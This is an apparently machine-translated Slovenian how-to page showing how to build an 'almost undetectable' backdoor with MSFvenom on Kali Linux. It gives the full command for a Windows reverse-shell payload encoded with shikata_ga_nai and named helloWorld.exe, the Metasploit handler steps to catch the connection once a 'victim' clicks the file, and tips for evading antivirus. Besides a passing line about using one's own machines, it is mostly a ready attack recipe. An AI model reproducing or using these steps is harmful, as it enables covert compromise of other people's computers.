Kako z MSFvenom v Kali Linuxu ustvariti skoraj neopazno zaledje

Kazalo:

Kako z MSFvenom v Kali Linuxu ustvariti skoraj neopazno zaledje
Kako z MSFvenom v Kali Linuxu ustvariti skoraj neopazno zaledje

Video: Kako z MSFvenom v Kali Linuxu ustvariti skoraj neopazno zaledje

Video: Kako z MSFvenom v Kali Linuxu ustvariti skoraj neopazno zaledje
Video: Decline of the Byzantine Empire: The Battle of Manzikert | 1071 AD 2024, Maj
Anonim

Zadnja vrata se uporabljajo za izogibanje varnostnim mehanizmom, pogosto na skrivaj in večinoma neopazno. Z uporabo MSFvenom, kombinacije msfpayload in msfencode, je mogoče ustvariti stranska vrata, ki se povežejo z napadalcem z uporabo TCP -ja za povratno lupino. Če želite razviti backdoor, morate spremeniti podpis zlonamerne programske opreme, da se izognete protivirusni programski opremi. Dokončajte ta projekt na parih računalnikih, do katerih imate dovoljenje za dostop, in med tem boste izvedeli več o računalniški varnosti in o tem, kako tovrstna zaledna vrata delujejo.

Koraki

Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linuxu 1. korak
Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linuxu 1. korak

Korak 1. Zaženite Kali in zaženite terminalsko konzolo

Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v 2. koraku Kali Linux
Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v 2. koraku Kali Linux

Korak 2. Vnesite ifconfig za prikaz vmesnika in preverite svoj IP naslov

Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linuxu 3. korak
Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linuxu 3. korak

Korak 3. Vnesite kodirnike msfvenom -l, da se prikaže seznam kodirnikov

Kot kodirnik boste uporabili x86/shikata_ga_nai

Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linuxu 4. korak
Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linuxu 4. korak

Korak 4. Vnesite "msfvenom -a x86 -platforma Windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe

  • -a x86 -platforma Windows označuje arhitekturo za uporabo.
  • -p windows/shell/reverse_tcp označuje uporabne obremenitve za vdelavo.
  • LHOST označuje IP naslov poslušalca.
  • LPORT označuje vrata poslušalca.
  • -b "\ x00" označuje, da se izognemo slabim znakom (ničelni bajti).
  • -e x86/shikata_ga_nai označuje ime kodirnika.
  • -f exe> helloWorld.exe označuje izhod formata.
Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linux Korak 5
Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linux Korak 5

Korak 5. Vnesite msfconsole, da aktivirate Metasploit

Zdaj ste ustvarili zadnja vrata. Ko žrtev klikne helloWorld.exe, se vklopi koristna obremenitev lupine in vzpostavi povezavo z vašim sistemom. Če želite prejeti povezavo, morate odpreti večnamenski upravljalnik v Metasploitu in nastaviti koristne obremenitve

Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linux Korak 6
Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linux Korak 6

Korak 6. Vnesite use exploit/multi/handler

Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v 7. koraku Kali Linux
Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v 7. koraku Kali Linux

Korak 7. Vnesite set payload windows/shell/reverse_tcp

Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linux 8. korak
Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linux 8. korak

Korak 8. Vnesite show options, da preverite modul

Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v 9. koraku Kali Linux
Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v 9. koraku Kali Linux

Korak 9. Vnesite niz LHOST 192.168.48.129

"LHOST" označuje naslov poslušalca IP

Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linux 10. korak
Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linux 10. korak

Korak 10. Vnesite niz LPORT 4444

"LPORT" označuje vrata poslušalca

Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linux 11. korak
Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linux 11. korak

Korak 11. Vnesite run in počakajte na povezavo iz računalnika žrtve

Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linux 12. korak
Ustvarite skoraj neopazno zaledje z uporabo MSFvenom v Kali Linux 12. korak

Korak 12. Počakajte, da žrtev klikne helloWorld.exe

Potem boste uspešno povezani z računalnikom žrtve.

Nasveti

  • Uporaba -i v MSFvenom bo predstavljala ponovitve kodiranja. Včasih lahko več ponovitev pomaga pri izogibanju programski opremi AV.
  • Naučili ste se ustvariti zaledje in kodirati z uporabo MSFvenom, vendar ta metoda danes ne bo delovala popolnoma proti nekaterim programom AV. Razlog za to so predloge izvedbe v MSFvenom. Prodajalci AV so dodali statični podpis teh predlog in jih samo poiščejo. Rešitev za to težavo je uporaba drugačne predloge izvedbe ali različnih orodij.

Priporočena: